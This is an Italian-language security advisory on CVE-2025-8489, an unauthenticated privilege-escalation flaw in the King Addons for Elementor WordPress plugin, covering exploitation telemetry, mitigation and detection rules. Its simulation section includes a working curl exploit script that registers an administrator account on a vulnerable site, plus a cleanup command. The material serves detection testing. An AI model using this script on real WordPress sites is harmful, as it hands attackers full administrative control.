Vulnerabilità Critica nei King Addons per Elementor Sotto Attacco Attivo

Riepilogo

Una grave vulnerabilità di escalation dei privilegi non autenticata (CVE-2025-8489) nel plugin King Addons per Elementor di WordPress consente agli aggressori di registrare nuovi utenti con privilegi di amministratore. Il bug è stato sfruttato attivamente dal 31 ottobre 2025, con Wordfence che ha bloccato decine di migliaia di tentativi. Gli attaccanti sfruttano il problema tramite richieste POST appositamente create inviate all’endpoint admin-ajax.php. Le versioni dalla 24.12.92 alla 51.1.14 sono interessate, con una correzione disponibile nella versione 51.1.35.

Indagine

La telemetria di Wordfence ha registrato più di 48.400 tentativi di sfruttamento, con un notevole aumento tra il 9 e il 10 novembre 2025. L’indirizzo sorgente IPv6 più attivo è stato 2602:fa59:3:424::1. I payload malevoli utilizzano dati HTTP POST che impostano il parametro user_role su administrator durante il flusso di lavoro di registrazione. Non è stata osservata ulteriore distribuzione di malware oltre alla creazione di account amministratore rogue.

Mitigazione

Aggiorna King Addons per Elementor alla versione 51.1.35 o successiva. Abilita le protezioni firewall di Wordfence rilasciate il 4 agosto 2025 (premium) e il 3 settembre 2025 (gratuita). Verifica le liste degli utenti di WordPress per account amministratori inattesi e rivedi continuamente i registri per modelli POST sospetti.

Risposta

Attiva avvisi sul traffico POST a /wp-admin/admin-ajax.php che include user_role=administrator. Blocca gli indirizzi IP abusivi, prestando particolare attenzione all’origine IPv6 evidenziata. Esegui controlli di pulizia degli account e rimuovi eventuali utenti amministratori non autorizzati. Distribuisci firme IDS basate sull’host sintonizzate sulla struttura della richiesta osservata.

Esecuzione Simulazione

Pre-requisito: Il Controllo Pre-volo della Telemetria & Baseline deve essere superato.

• Narrazione dell’Attacco & Comandi:
  Un avversario scopre il CVE‑2025‑8489 nel plugin King Addons per Elementor. Creano una richiesta POST suadmin-ajax.php che include il parametro action=king_addons_user_register (richiesto dal plugin) and impone il ruolo di amministratore tramite user_role=administrator. Inviando direttamente questa richiesta all’endpoint vulnerabile, l’attaccante ottiene un account privilegiato su WordPress senza necessità di autenticazione preventiva. Il payload è codificato in URL per replicare un client web realistico.

• Script di Test di Regressione:

  #!/usr/bin/env bash
  # Script di exploit per l'escalation dei privilegi di King Addons per Elementor (CVE‑2025‑8489)
  
  TARGET="http://webserver.example.com"
  ENDPOINT="/wp-admin/admin-ajax.php"
  
  # Dati POST creati (codificati in URL)
  POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator"
  
  echo "[*] Inviando payload di exploit..."
  curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/x-www-form-urlencoded" 
       --data "${POST_DATA}"
  
  echo -e "n[+] Exploit inviato. Controlla il SIEM per l'avviso generato."

• Comandi di Pulizia:

  # Rimuovere l'utente malevolo creato durante il test
  curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" 
    -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')"
  echo "[*] Pulizia completata."